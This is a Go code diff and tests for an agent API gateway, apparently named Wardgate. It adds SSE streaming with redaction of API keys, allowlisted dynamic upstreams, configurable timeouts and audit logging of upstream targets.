+		for _, expected := range []string{"id: msg-001", "event: delta", "retry: 3000"} {
+			if !strings.Contains(bodyStr, expected) {
+				t.Errorf("expected SSE metadata %q preserved, got: %s", expected, bodyStr)
+			}
+		}
+	})
+
+	t.Run("multi-message stream: sensitive data mid-stream", func(t *testing.T) {
+		// Simulates a realistic scenario: LLM streaming where an API key
+		// appears partway through the response chunks.
+		upstream := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+			w.Header().Set("Content-Type", "text/event-stream")
+			w.WriteHeader(http.StatusOK)
+			// 5 clean messages, then one with sensitive data, then sentinel
+			for i := 0; i < 5; i++ {
+				w.Write([]byte(`data: {"choices":[{"delta":{"content":"word "}}]}` + "\n\n"))
+			}
+			w.Write([]byte(`data: {"choices":[{"delta":{"content":"key: sk-1234567890abcdef1234567890abcdef"}}]}` + "\n\n"))
+			w.Write([]byte("data: [DONE]\n\n"))
+		}))
+		defer upstream.Close()
+
+		f := newSSEFilter(t, filter.ActionRedact, "filter")
+		gw := buildSSEGateway(t, "sse-multi", upstream.URL, agents, allowAll, credEnv, f)
+		defer gw.Close()
+
+		resp := doSSERequest(t, gw, agentKey, "/sse-multi/stream")
+		defer resp.Body.Close()
+
+		events := readSSEEvents(t, resp.Body)
+
+		// Should have 7 events (5 clean + 1 redacted + 1 DONE)
+		if len(events) != 7 {
+			t.Fatalf("expected 7 SSE events, got %d", len(events))
+		}
+
+		// First 5 should pass through with "word "
+		for i := 0; i < 5; i++ {
+			if !strings.Contains(events[i], "word ") {
+				t.Errorf("event %d should contain 'word ', got: %s", i, events[i])
+			}
+		}
+
+		// 6th event should have API key redacted
+		if strings.Contains(events[5], "sk-1234567890abcdef1234567890abcdef") {
+			t.Error("API key leaked in mid-stream event")
+		}
+		if !strings.Contains(events[5], "[REDACTED]") {
+			t.Error("expected redaction marker in mid-stream event")
+		}
+
+		// 7th event: DONE
+		if !strings.Contains(events[6], "[DONE]") {
+			t.Errorf("expected [DONE] sentinel, got: %s", events[6])
+		}
+	})
+}
+
+// TestSSE_DynamicUpstream_E2E tests SSE streaming through dynamic upstreams.
+func TestSSE_DynamicUpstream_E2E(t *testing.T) {
+	agentKey := "test-dyn-sse-key-" + randomHexKey(t, 8)
+	agentKeyEnv := "TEST_DYN_SSE_AGENT_KEY"
+	credEnv := "TEST_DYN_SSE_CRED"
+
+	t.Setenv(agentKeyEnv, agentKey)
+	t.Setenv(credEnv, "upstream-token")
+
+	agents := []config.AgentConfig{
+		{ID: "dyn-agent", KeyEnv: agentKeyEnv},
+	}
+
+	t.Run("SSE stream via dynamic upstream with filtering", func(t *testing.T) {
+		upstream := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+			w.Header().Set("Content-Type", "text/event-stream")
+			w.WriteHeader(http.StatusOK)
+			w.Write([]byte("data: {\"key\": \"sk-1234567890abcdef1234567890abcdef\"}\n\n"))
+			w.Write([]byte("data: [DONE]\n\n"))
+		}))
+		defer upstream.Close()
+
+		f := newSSEFilter(t, filter.ActionRedact, "filter")
+
+		engine := policy.New([]config.Rule{
+			{Match: config.Match{Method: "*"}, Action: "allow"},
+		})
+
+		vault := &mockVault{creds: map[string]string{credEnv: "upstream-token"}}
+		endpoint := config.Endpoint{
+			// No static upstream — must use dynamic
+			AllowedUpstreams: []string{upstream.URL},
+			Auth:             config.AuthConfig{Type: "bearer", CredentialEnv: credEnv},
+		}
+
+		p := proxy.NewWithName("dyn-sse", endpoint, vault, engine)
+		p.SetFilter(f)
+
+		apiMux := http.NewServeMux()
+		apiMux.Handle("/dyn-sse/", http.StripPrefix("/dyn-sse", p))
+		gw := httptest.NewServer(auth.NewAgentAuthMiddleware(agents, nil, apiMux))
+		defer gw.Close()
+
+		req, _ := http.NewRequest("GET", gw.URL+"/dyn-sse/stream", nil)
+		req.Header.Set("Authorization", "Bearer "+agentKey)
+		req.Header.Set("X-Wardgate-Upstream", upstream.URL)
+
+		resp, err := gw.Client().Do(req)
+		if err != nil {
+			t.Fatal(err)
+		}
+		defer resp.Body.Close()
+
+		if resp.StatusCode != http.StatusOK {
+			body, _ := io.ReadAll(resp.Body)
+			t.Fatalf("expected 200, got %d: %s", resp.StatusCode, body)
+		}
+
+		body, _ := io.ReadAll(resp.Body)
+		bodyStr := string(body)
+
+		if strings.Contains(bodyStr, "sk-1234567890abcdef1234567890abcdef") {
+			t.Error("API key leaked via dynamic upstream SSE stream")
+		}
+		if !strings.Contains(bodyStr, "[REDACTED]") {
+			t.Error("expected redaction in dynamic upstream SSE stream")
+		}
+		if !strings.Contains(bodyStr, "[DONE]") {
+			t.Error("expected [DONE] sentinel to pass through")
+		}
+	})
+
+	t.Run("dynamic upstream denied rejects before streaming", func(t *testing.T) {
+		upstream := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+			t.Error("upstream should not be reached for denied dynamic upstream")
+		}))
+		defer upstream.Close()
+
+		engine := policy.New([]config.Rule{
+			{Match: config.Match{Method: "*"}, Action: "allow"},
+		})
+
+		vault := &mockVault{creds: map[string]string{credEnv: "upstream-token"}}
+		endpoint := config.Endpoint{
+			AllowedUpstreams: []string{"https://api.allowed.com"},
+			Auth:             config.AuthConfig{Type: "bearer", CredentialEnv: credEnv},
+		}
+
+		p := proxy.NewWithName("dyn-deny", endpoint, vault, engine)
+
+		apiMux := http.NewServeMux()
+		apiMux.Handle("/dyn-deny/", http.StripPrefix("/dyn-deny", p))
+		gw := httptest.NewServer(auth.NewAgentAuthMiddleware(agents, nil, apiMux))
+		defer gw.Close()
+
+		req, _ := http.NewRequest("GET", gw.URL+"/dyn-deny/stream", nil)
+		req.Header.Set("Authorization", "Bearer "+agentKey)
+		req.Header.Set("X-Wardgate-Upstream", upstream.URL) // not in allowed list
+
+		resp, err := gw.Client().Do(req)
+		if err != nil {
+			t.Fatal(err)
+		}
+		defer resp.Body.Close()
+
+		if resp.StatusCode != http.StatusBadRequest {
+			t.Errorf("expected 400 for denied dynamic upstream, got %d", resp.StatusCode)
+		}
+	})
+}
+
+// TestSSE_ScannerBufferLimit tests that oversized SSE lines are handled gracefully.
+func TestSSE_ScannerBufferLimit(t *testing.T) {
+	agentKey := "test-buf-key-" + randomHexKey(t, 8)
+	agentKeyEnv := "TEST_BUF_AGENT_KEY"
+	credEnv := "TEST_BUF_CRED"
+
+	t.Setenv(agentKeyEnv, agentKey)
+	t.Setenv(credEnv, "token")
+
+	agents := []config.AgentConfig{
+		{ID: "buf-agent", KeyEnv: agentKeyEnv},
+	}
+	allowAll := []config.Rule{
+		{Match: config.Match{Method: "*"}, Action: "allow"},
+	}
+
+	t.Run("normal large SSE message within buffer limit", func(t *testing.T) {
+		// 100KB data line — well within 1MB limit
+		largePayload := strings.Repeat("x", 100*1024)
+		sseData := "data: " + largePayload + "\n\n"
+
+		upstream := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+			w.Header().Set("Content-Type", "text/event-stream")
+			w.WriteHeader(http.StatusOK)
+			w.Write([]byte(sseData))
+		}))
+		defer upstream.Close()
+
+		f := newSSEFilter(t, filter.ActionRedact, "filter")
+		gw := buildSSEGateway(t, "sse-bigok", upstream.URL, agents, allowAll, credEnv, f)
+		defer gw.Close()
+
+		resp := doSSERequest(t, gw, agentKey, "/sse-bigok/stream")
+		defer resp.Body.Close()
+
+		if resp.StatusCode != http.StatusOK {
+			t.Fatalf("expected 200 for large-but-within-limit SSE, got %d", resp.StatusCode)
+		}
+
+		body, _ := io.ReadAll(resp.Body)
+		if len(body) < 100*1024 {
+			t.Errorf("expected large payload to pass through, got %d bytes", len(body))
+		}
+	})
+
+	t.Run("oversized SSE line exceeding buffer limit", func(t *testing.T) {
+		// 2MB data line — exceeds 1MB scanner limit
+		hugePayload := strings.Repeat("x", 2*1024*1024)
+		sseData := "data: " + hugePayload + "\n\n"
+
+		upstream := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+			w.Header().Set("Content-Type", "text/event-stream")
+			w.WriteHeader(http.StatusOK)
+			w.Write([]byte(sseData))
+		}))
+		defer upstream.Close()
+
+		f := newSSEFilter(t, filter.ActionRedact, "filter")
+		gw := buildSSEGateway(t, "sse-huge", upstream.URL, agents, allowAll, credEnv, f)
+		defer gw.Close()
+
+		resp := doSSERequest(t, gw, agentKey, "/sse-huge/stream")
+		defer resp.Body.Close()
+
+		// The response should complete without hanging. The scanner will hit
+		// its buffer limit and return an error, which surfaces as a truncated
+		// or empty body (the SSE reader sets done=true on scanner error).
+		body, _ := io.ReadAll(resp.Body)
+
+		// The key assertion: the oversized line should NOT pass through intact.
+		// Either the body is truncated or empty — the gateway handled it gracefully.
+		if len(body) >= 2*1024*1024 {
+			t.Error("oversized SSE line should not pass through the filter intact")
+		}
+	})
+}
+
+// --- helpers ---
+
+func newSSEFilter(t *testing.T, action filter.Action, sseMode string) *filter.Filter {
+	t.Helper()
+	f, err := filter.New(filter.Config{
+		Enabled:     true,
+		Patterns:    []string{"api_keys"},
+		Action:      action,
+		Replacement: "[REDACTED]",
+		SSEMode:     sseMode,
+	})
+	if err != nil {
+		t.Fatalf("failed to create filter: %v", err)
+	}
+	return f
+}
+
+// buildSSEGateway wires up a full gateway stack for SSE testing, mirroring main.go.
+func buildSSEGateway(
+	t *testing.T,
+	name string,
+	upstreamURL string,
+	agents []config.AgentConfig,
+	rules []config.Rule,
+	credEnv string,
+	f *filter.Filter,
+) *httptest.Server {
+	t.Helper()
+
+	engine := policy.New(rules)
+	vault := &mockVault{creds: map[string]string{credEnv: "upstream-token"}}
+
+	endpoint := config.Endpoint{
+		Upstream: upstreamURL,
+		Auth:     config.AuthConfig{Type: "bearer", CredentialEnv: credEnv},
+	}
+
+	p := proxy.NewWithName(name, endpoint, vault, engine)
+	if f != nil {
+		p.SetFilter(f)
+	}
+
+	apiMux := http.NewServeMux()
+	apiMux.Handle("/"+name+"/", http.StripPrefix("/"+name, p))
+
+	gw := httptest.NewServer(auth.NewAgentAuthMiddleware(agents, nil, apiMux))
+	t.Cleanup(gw.Close)
+	return gw
+}
+
+func doSSERequest(t *testing.T, gw *httptest.Server, agentKey, path string) *http.Response {
+	t.Helper()
+	req, _ := http.NewRequest("GET", gw.URL+path, nil)
+	req.Header.Set("Authorization", "Bearer "+agentKey)
+	resp, err := gw.Client().Do(req)
+	if err != nil {
+		t.Fatal(err)
+	}
+	return resp
+}
+
+// readSSEEvents parses SSE events from the response body.
+// Each event is the raw text between blank-line delimiters.
+func readSSEEvents(t *testing.T, body io.Reader) []string {
+	t.Helper()
+	var events []string
+	var current strings.Builder
+
+	scanner := bufio.NewScanner(body)
+	for scanner.Scan() {
+		line := scanner.Text()
+		if line == "" {
+			// Blank line = end of event
+			if current.Len() > 0 {
+				events = append(events, current.String())
+				current.Reset()
+			}
+			continue
+		}
+		if current.Len() > 0 {
+			current.WriteString("\n")
+		}
+		current.WriteString(line)
+	}
+	// Capture any trailing event without final blank line
+	if current.Len() > 0 {
+		events = append(events, current.String())
+	}
+	return events
+}

--- a/internal/audit/logger.go
+++ b/internal/audit/logger.go
@@ -13,6 +13,7 @@ type Entry struct {
 	Endpoint       string `json:"endpoint,omitempty"`
 	Method         string `json:"method,omitempty"`
 	Path           string `json:"path,omitempty"`
+	Upstream       string `json:"upstream,omitempty"`
 	SourceIP       string `json:"source_ip,omitempty"`
 	AgentID        string `json:"agent,omitempty"`
 	Decision       string `json:"decision,omitempty"`
@@ -68,6 +69,9 @@ func (l *Logger) LogWithBody(e Entry, body string) {
 	}
 	if e.AgentID != "" {
 		event = event.Str("agent", e.AgentID)
+	}
+	if e.Upstream != "" {
+		event = event.Str("upstream", e.Upstream)
 	}
 	if e.Message != "" {
 		event = event.Str("message", e.Message)

--- a/internal/config/config.go
+++ b/internal/config/config.go
@@ -4,9 +4,11 @@ import (
 	"fmt"
 	"io"
 	"log"
+	"net/url"
 	"os"
 	"path/filepath"
 	"strings"
+	"time"
 
 	"gopkg.in/yaml.v3"
 )
@@ -298,19 +300,21 @@ type AgentConfig struct {
 
 // Endpoint defines a proxied service.
 type Endpoint struct {
-	Preset       string            `yaml:"preset,omitempty"`      // Preset name (e.g., "todoist", "github")
-	Description  string            `yaml:"description,omitempty"` // User-friendly description for discovery API
-	Agents       []string          `yaml:"agents,omitempty"`      // Restrict to specific agents (empty = all)
-	Adapter      string            `yaml:"adapter,omitempty"`     // "http" (default), "imap", or "smtp"
-	Upstream     string            `yaml:"upstream,omitempty"`
-	DocsURL      string            `yaml:"docs_url,omitempty"` // Link to API documentation (optional, overrides preset)
-	Auth         AuthConfig        `yaml:"auth"`
-	Capabilities map[string]string `yaml:"capabilities,omitempty"` // Named capabilities with actions (e.g., "create_issues": "allow")
-	Rules        []Rule            `yaml:"rules,omitempty"`
-	IMAP         *IMAPConfig       `yaml:"imap,omitempty"`   // IMAP-specific settings
-	SMTP         *SMTPConfig       `yaml:"smtp,omitempty"`   // SMTP-specific settings
-	SSH          *SSHConfig        `yaml:"ssh,omitempty"`    // SSH-specific settings
-	Filter       *FilterConfig     `yaml:"filter,omitempty"` // Sensitive data filtering settings
+	Preset           string            `yaml:"preset,omitempty"`      // Preset name (e.g., "todoist", "github")
+	Description      string            `yaml:"description,omitempty"` // User-friendly description for discovery API
+	Agents           []string          `yaml:"agents,omitempty"`      // Restrict to specific agents (empty = all)
+	Adapter          string            `yaml:"adapter,omitempty"`     // "http" (default), "imap", or "smtp"
+	Upstream         string            `yaml:"upstream,omitempty"`
+	AllowedUpstreams []string          `yaml:"allowed_upstreams,omitempty"` // Glob patterns for dynamic upstream targets
+	Timeout          string            `yaml:"timeout,omitempty"`           // Upstream request timeout (e.g., "10m" for SSE streams)
+	DocsURL          string            `yaml:"docs_url,omitempty"`          // Link to API documentation (optional, overrides preset)
+	Auth             AuthConfig        `yaml:"auth"`
+	Capabilities     map[string]string `yaml:"capabilities,omitempty"` // Named capabilities with actions (e.g., "create_issues": "allow")
+	Rules            []Rule            `yaml:"rules,omitempty"`
+	IMAP             *IMAPConfig       `yaml:"imap,omitempty"`   // IMAP-specific settings
+	SMTP             *SMTPConfig       `yaml:"smtp,omitempty"`   // SMTP-specific settings
+	SSH              *SSHConfig        `yaml:"ssh,omitempty"`    // SSH-specific settings
+	Filter           *FilterConfig     `yaml:"filter,omitempty"` // Sensitive data filtering settings
 }
 
 // FilterConfig holds sensitive data filtering settings.
@@ -320,6 +324,7 @@ type FilterConfig struct {
 	CustomPatterns []CustomPatternConfig `yaml:"custom_patterns,omitempty"` // User-defined patterns
 	Action         string                `yaml:"action,omitempty"`          // redact, block, ask, log (default: block)
 	Replacement    string                `yaml:"replacement,omitempty"`     // Replacement text for redact action
+	SSEMode        string                `yaml:"sse_mode,omitempty"`        // SSE handling: "filter" (default) or "passthrough"
 }
 
 // CustomPatternConfig defines a user-created pattern.
@@ -669,8 +674,26 @@ func (c *Config) validate() error {
 			}
 			continue
 		}
-		if ep.Upstream == "" {
-			return fmt.Errorf("endpoint %q: missing upstream", name)
+		// allowed_upstreams is only valid for HTTP adapter
+		if len(ep.AllowedUpstreams) > 0 && adapter != "" && adapter != "http" {
+			return fmt.Errorf("endpoint %q: allowed_upstreams is only valid for HTTP adapter", name)
+		}
+		// Must have at least upstream or allowed_upstreams for HTTP endpoints
+		if ep.Upstream == "" && len(ep.AllowedUpstreams) == 0 {
+			return fmt.Errorf("endpoint %q: missing upstream (set upstream or allowed_upstreams)", name)
+		}
+		// Validate allowed_upstreams patterns have valid HTTP/HTTPS scheme
+		for _, pattern := range ep.AllowedUpstreams {
+			u, err := url.Parse(strings.ReplaceAll(pattern, "*", "WILDCARD"))
+			if err != nil || (u.Scheme != "http" && u.Scheme != "https") {
+				return fmt.Errorf("endpoint %q: allowed_upstreams pattern %q must have http:// or https:// scheme", name, pattern)
+			}
+		}
+		// Validate timeout
+		if ep.Timeout != "" {
+			if _, err := time.ParseDuration(ep.Timeout); err != nil {
+				return fmt.Errorf("endpoint %q: invalid timeout %q: %w", name, ep.Timeout, err)
+			}
 		}
 		if ep.Auth.Sealed {
 			if ep.Auth.CredentialEnv != "" {

--- a/internal/config/config_test.go
+++ b/internal/config/config_test.go
@@ -1715,3 +1715,241 @@ endpoints:
 		t.Errorf("error should mention capabilities: %v", err)
 	}
 }
+
+func TestLoadConfig_AllowedUpstreamsValid(t *testing.T) {
+	yaml := `
+server:
+  listen: ":8080"
+agents:
+  - id: tessa
+    key_env: WARDGATE_AGENT_KEY
+endpoints:
+  google:
+    allowed_upstreams:
+      - "https://*.googleapis.com"
+      - "https://storage.googleapis.com"
+    auth:
+      type: bearer
+      credential_env: GOOGLE_KEY
+    rules:
+      - match: { method: GET }
+        action: allow
+`
+	cfg, err := LoadFromReader(strings.NewReader(yaml))
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+	ep := cfg.Endpoints["google"]
+	if len(ep.AllowedUpstreams) != 2 {
+		t.Errorf("expected 2 allowed upstreams, got %d", len(ep.AllowedUpstreams))
+	}
+	if ep.Upstream != "" {
+		t.Errorf("expected empty upstream, got %s", ep.Upstream)
+	}
+}
+
+func TestLoadConfig_AllowedUpstreamsWithStatic(t *testing.T) {
+	yaml := `
+server:
+  listen: ":8080"
+agents:
+  - id: tessa
+    key_env: WARDGATE_AGENT_KEY
+endpoints:
+  github:
+    upstream: https://api.github.com
+    allowed_upstreams:
+      - "https://api.github.com"
+      - "https://uploads.github.com"
+    auth:
+      type: bearer
+      credential_env: GITHUB_KEY
+    rules:
+      - match: { method: GET }
+        action: allow
+`
+	cfg, err := LoadFromReader(strings.NewReader(yaml))
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+	ep := cfg.Endpoints["github"]
+	if ep.Upstream != "https://api.github.com" {
+		t.Errorf("expected static upstream, got %s", ep.Upstream)
+	}
+	if len(ep.AllowedUpstreams) != 2 {
+		t.Errorf("expected 2 allowed upstreams, got %d", len(ep.AllowedUpstreams))
+	}
+}
+
+func TestLoadConfig_AllowedUpstreamsNoScheme(t *testing.T) {
+	yaml := `
+server:
+  listen: ":8080"
+agents:
+  - id: tessa
+    key_env: WARDGATE_AGENT_KEY
+endpoints:
+  test:
+    allowed_upstreams:
+      - "*.example.com"
+    auth:
+      type: bearer
+      credential_env: TEST_KEY
+    rules:
+      - match: { method: GET }
+        action: allow
+`
+	_, err := LoadFromReader(strings.NewReader(yaml))
+	if err == nil {
+		t.Fatal("expected error for allowed_upstreams without scheme")
+	}
+	if !strings.Contains(err.Error(), "http://") {
+		t.Errorf("error should mention scheme requirement: %v", err)
+	}
+}
+
+func TestLoadConfig_AllowedUpstreamsNonHTTPAdapter(t *testing.T) {
+	yaml := `
+server:
+  listen: ":8080"
+agents:
+  - id: tessa
+    key_env: WARDGATE_AGENT_KEY
+endpoints:
+  test:
+    adapter: imap
+    upstream: imaps://imap.example.com:993
+    allowed_upstreams:
+      - "https://api.example.com"
+    auth:
+      type: bearer
+      credential_env: TEST_KEY
+    imap:
+      tls: true
+    rules:
+      - match: { method: GET }
+        action: allow
+`
+	_, err := LoadFromReader(strings.NewReader(yaml))
+	if err == nil {
+		t.Fatal("expected error for allowed_upstreams on non-HTTP adapter")
+	}
+	if !strings.Contains(err.Error(), "only valid for HTTP") {
+		t.Errorf("error should mention HTTP adapter requirement: %v", err)
+	}
+}
+
+func TestLoadConfig_MissingBothUpstreams(t *testing.T) {
+	yaml := `
+server:
+  listen: ":8080"
+agents:
+  - id: tessa
+    key_env: WARDGATE_AGENT_KEY
+endpoints:
+  test:
+    auth:
+      type: bearer
+      credential_env: TEST_KEY
+    rules:
+      - match: { method: GET }
+        action: allow
+`
+	_, err := LoadFromReader(strings.NewReader(yaml))
+	if err == nil {
+		t.Fatal("expected error when neither upstream nor allowed_upstreams is set")
+	}
+	if !strings.Contains(err.Error(), "missing upstream") {
+		t.Errorf("error should mention missing upstream: %v", err)
+	}
+}
+
+func TestLoadConfig_TimeoutValid(t *testing.T) {
+	yaml := `
+server:
+  listen: ":8080"
+agents:
+  - id: tessa
+    key_env: WARDGATE_AGENT_KEY
+endpoints:
+  openai:
+    upstream: https://api.openai.com/v1
+    timeout: "10m"
+    auth:
+      type: bearer
+      credential_env: OPENAI_KEY
+    rules:
+      - match: { method: "*" }
+        action: allow
+`
+	cfg, err := LoadFromReader(strings.NewReader(yaml))
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+	ep := cfg.Endpoints["openai"]
+	if ep.Timeout != "10m" {
+		t.Errorf("expected timeout '10m', got %s", ep.Timeout)
+	}
+}
+
+func TestLoadConfig_TimeoutInvalid(t *testing.T) {
+	yaml := `
+server:
+  listen: ":8080"
+agents:
+  - id: tessa
+    key_env: WARDGATE_AGENT_KEY
+endpoints:
+  test:
+    upstream: https://api.example.com
+    timeout: "invalid"
+    auth:
+      type: bearer
+      credential_env: TEST_KEY
+    rules:
+      - match: { method: "*" }
+        action: allow
+`
+	_, err := LoadFromReader(strings.NewReader(yaml))
+	if err == nil {
+		t.Fatal("expected error for invalid timeout")
+	}
+	if !strings.Contains(err.Error(), "invalid timeout") {
+		t.Errorf("error should mention invalid timeout: %v", err)
+	}
+}
+
+func TestLoadConfig_SSEMode(t *testing.T) {
+	yaml := `
+server:
+  listen: ":8080"
+agents:
+  - id: tessa
+    key_env: WARDGATE_AGENT_KEY
+endpoints:
+  openai:
+    upstream: https://api.openai.com/v1
+    auth:
+      type: bearer
+      credential_env: OPENAI_KEY
+    filter:
+      enabled: true
+      patterns: [api_keys]
+      action: redact
+      sse_mode: passthrough
+    rules:
+      - match: { method: "*" }
+        action: allow
+`
+	cfg, err := LoadFromReader(strings.NewReader(yaml))
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+	ep := cfg.Endpoints["openai"]
+	if ep.Filter == nil {
+		t.Fatal("expected filter config")
+	}
+	if ep.Filter.SSEMode != "passthrough" {
+		t.Errorf("expected sse_mode 'passthrough', got %s", ep.Filter.SSEMode)
+	}
+}

--- a/internal/discovery/handler.go
+++ b/internal/discovery/handler.go
@@ -10,11 +10,13 @@ import (
 
 // EndpointInfo describes an available endpoint for agents.
 type EndpointInfo struct {
-	Name        string   `json:"name"`
-	Description string   `json:"description,omitempty"`
-	Upstream    string   `json:"upstream,omitempty"` // Base URL of the upstream API (for version info)
-	DocsURL     string   `json:"docs_url"`           // Link to API documentation (empty if none)
-	Agents      []string `json:"-"`                  // Restrict visibility to specific agents (not serialized)
+	Name             string   `json:"name"`
+	Description      string   `json:"description,omitempty"`
+	Upstream         string   `json:"upstream,omitempty"`          // Base URL of the upstream API (for version info)
+	AllowedUpstreams []string `json:"allowed_upstreams,omitempty"` // Glob patterns for dynamic upstreams
+	Dynamic          bool     `json:"dynamic,omitempty"`           // True if endpoint supports dynamic upstreams
+	DocsURL          string   `json:"docs_url"`                    // Link to API documentation (empty if none)
+	Agents           []string `json:"-"`                           // Restrict visibility to specific agents (not serialized)
 }
 
 // EndpointsResponse is the response for GET /endpoints.

--- a/internal/filter/filter.go
+++ b/internal/filter/filter.go
@@ -62,6 +62,7 @@ type Config struct {
 	CustomPatterns []CustomPattern `yaml:"custom_patterns,omitempty"` // User-defined patterns
 	Action         Action          `yaml:"action"`
 	Replacement    string          `yaml:"replacement,omitempty"` // Replacement text for redact action
+	SSEMode        string          `yaml:"sse_mode,omitempty"`    // SSE handling: "filter" (default) or "passthrough"
 }
 
 // CustomPattern defines a user-created pattern.
@@ -103,6 +104,7 @@ type Filter struct {
 	patterns    []*Pattern
 	action      Action
 	replacement string
+	sseMode     string
 }
 
 // New creates a new Filter from configuration.
@@ -111,6 +113,7 @@ func New(cfg Config) (*Filter, error) {
 		enabled:     cfg.Enabled,
 		action:      cfg.Action,
 		replacement: cfg.Replacement,
+		sseMode:     cfg.SSEMode,
 	}
 
 	if !cfg.Enabled {
@@ -244,6 +247,15 @@ func (f *Filter) Action() Action {
 // Enabled returns whether the filter is enabled.
 func (f *Filter) Enabled() bool {
 	return f.enabled
+}
+
+// SSEMode returns the SSE handling mode ("filter" or "passthrough").
+// Defaults to "filter" if not set.
+func (f *Filter) SSEMode() string {
+	if f.sseMode == "" {
+		return "filter"
+	}
+	return f.sseMode
 }
 
 // MatchDescription returns a human-readable description of the matches.

--- a/internal/proxy/http.go
+++ b/internal/proxy/http.go
@@ -33,6 +33,8 @@ var DefaultAllowedSealHeaders = []string{
 	"Proxy-Authorization",
 }
 
+const upstreamHeader = "X-Wardgate-Upstream"
+
 // Proxy handles HTTP requests to an endpoint.
 type Proxy struct {
 	endpoint           config.Endpoint
@@ -40,6 +42,7 @@ type Proxy struct {
 	vault              auth.Vault
 	engine             *policy.Engine
 	upstream           *url.URL
+	allowedUpstreams   []string
 	timeout            time.Duration
 	approvals          *approval.Manager
 	filter             *filter.Filter
@@ -78,20 +81,19 @@ func (p *Proxy) SetGrantStore(s *grants.Store) {
 	p.grantStore = s
 }
 
-// SetSSEMode is a placeholder for SSE mode configuration.
-func (p *Proxy) SetSSEMode(mode string) {
-	// TODO: Implement SSE mode support
-}
-
 // New creates a new proxy for the given endpoint.
 func New(endpoint config.Endpoint, vault auth.Vault, engine *policy.Engine) *Proxy {
-	upstream, _ := url.Parse(endpoint.Upstream)
+	var upstream *url.URL
+	if endpoint.Upstream != "" {
+		upstream, _ = url.Parse(endpoint.Upstream)
+	}
 	return &Proxy{
-		endpoint: endpoint,
-		vault:    vault,
-		engine:   engine,
-		upstream: upstream,
-		timeout:  30 * time.Second,
+		endpoint:         endpoint,
+		vault:            vault,
+		engine:           engine,
+		upstream:         upstream,
+		allowedUpstreams: endpoint.AllowedUpstreams,
+		timeout:          30 * time.Second,
 	}
 }
 
@@ -164,6 +166,13 @@ func (p *Proxy) ServeHTTP(w http.ResponseWriter, r *http.Request) {
 		}
 	}
 
+	// Resolve upstream target
+	target, err := p.resolveUpstream(r)
+	if err != nil {
+		http.Error(w, err.Error(), http.StatusBadRequest)
+		return
+	}
+
 	// Get credential (skip for sealed — agent provides credentials)
 	var cred string
 	if p.endpoint.Auth.Sealed {
@@ -179,7 +188,6 @@ func (p *Proxy) ServeHTTP(w http.ResponseWriter, r *http.Request) {
 			return
 		}
 	} else {
-		var err error
 		cred, err = p.vault.Get(p.endpoint.Auth.CredentialEnv)
 		if err != nil {
 			http.Error(w, "credential error", http.StatusInternalServerError)
@@ -190,10 +198,13 @@ func (p *Proxy) ServeHTTP(w http.ResponseWriter, r *http.Request) {
 	// Create reverse proxy
 	proxy := &httputil.ReverseProxy{
 		Director: func(req *http.Request) {
-			req.URL.Scheme = p.upstream.Scheme
-			req.URL.Host = p.upstream.Host
-			req.URL.Path = p.upstream.Path + r.URL.Path
-			req.Host = p.upstream.Host
+			req.URL.Scheme = target.Scheme
+			req.URL.Host = target.Host
+			req.URL.Path = target.Path + r.URL.Path
+			req.Host = target.Host
+
+			// Strip the upstream header before forwarding
+			req.Header.Del(upstreamHeader)
 
 			if p.endpoint.Auth.Sealed && p.sealer != nil {
 				p.processSealedHeaders(req, r.Header)
@@ -206,6 +217,7 @@ func (p *Proxy) ServeHTTP(w http.ResponseWriter, r *http.Request) {
 			}
 		},
 		ModifyResponse: p.modifyResponse,
+		FlushInterval:  -1, // Enable immediate flushing for streaming responses
 		ErrorHandler: func(w http.ResponseWriter, r *http.Request, err error) {
 			if ctx := r.Context(); ctx.Err() == context.DeadlineExceeded {
 				http.Error(w, "upstream timeout", http.StatusGatewayTimeout)
@@ -221,6 +233,34 @@ func (p *Proxy) ServeHTTP(w http.ResponseWriter, r *http.Request) {
 	r = r.WithContext(ctx)
 
 	proxy.ServeHTTP(w, r)
+}
+
+// resolveUpstream determines the target upstream URL from the request.
+// Priority: X-Wardgate-Upstream header > static upstream config.
+func (p *Proxy) resolveUpstream(r *http.Request) (*url.URL, error) {
+	headerVal := r.Header.Get(upstreamHeader)
+
+	if headerVal != "" {
+		// Dynamic upstream requested - validate against allowed patterns
+		if len(p.allowedUpstreams) == 0 {
+			return nil, fmt.Errorf("dynamic upstream not allowed: endpoint has no allowed_upstreams configured")
+		}
+		if !MatchUpstream(headerVal, p.allowedUpstreams) {
+			return nil, fmt.Errorf("upstream %q not in allowed list", headerVal)
+		}
+		u, err := url.Parse(headerVal)
+		if err != nil {
+			return nil, fmt.Errorf("invalid upstream URL: %w", err)
+		}
+		return u, nil
+	}
+
+	// Fall back to static upstream
+	if p.upstream != nil {
+		return p.upstream, nil
+	}
+
+	return nil, fmt.Errorf("no upstream configured and no %s header provided", upstreamHeader)
 }
 
 // processSealedHeaders decrypts X-Wardgate-Sealed-* headers and sets the real
@@ -259,8 +299,26 @@ func (p *Proxy) modifyResponse(resp *http.Response) error {
 		return nil
 	}
 
-	// Only filter text-based responses
 	contentType := resp.Header.Get("Content-Type")
+
+	// Handle SSE streams — must come before isTextContent because
+	// "text/event-stream" matches the "text/" prefix check.
+	if isSSEContent(contentType) {
+		if p.filter.SSEMode() == "passthrough" {
+			return nil
+		}
+		// Wrap body with SSE filter reader for per-message filtering
+		resp.Body = &sseFilterReader{
+			reader: resp.Body,
+			filter: p.filter,
+		}
+		// Remove Content-Length since we're streaming and size may change
+		resp.Header.Del("Content-Length")
+		resp.ContentLength = -1
+		return nil
+	}
+
+	// Only filter text-based responses
 	if !isTextContent(contentType) {
 		return nil
 	}
@@ -278,7 +336,8 @@ func (p *Proxy) modifyResponse(resp *http.Response) error {
 	// Handle based on action
 	if p.filter.ShouldBlock(matches) {
 		// Return error response - replace body with error message
-		errMsg := fmt.Sprintf(`{"error": "response blocked", "reason": "%s"}`, filter.MatchDescription(matches))
+		// Generic message — do not leak filter pattern names to clients.
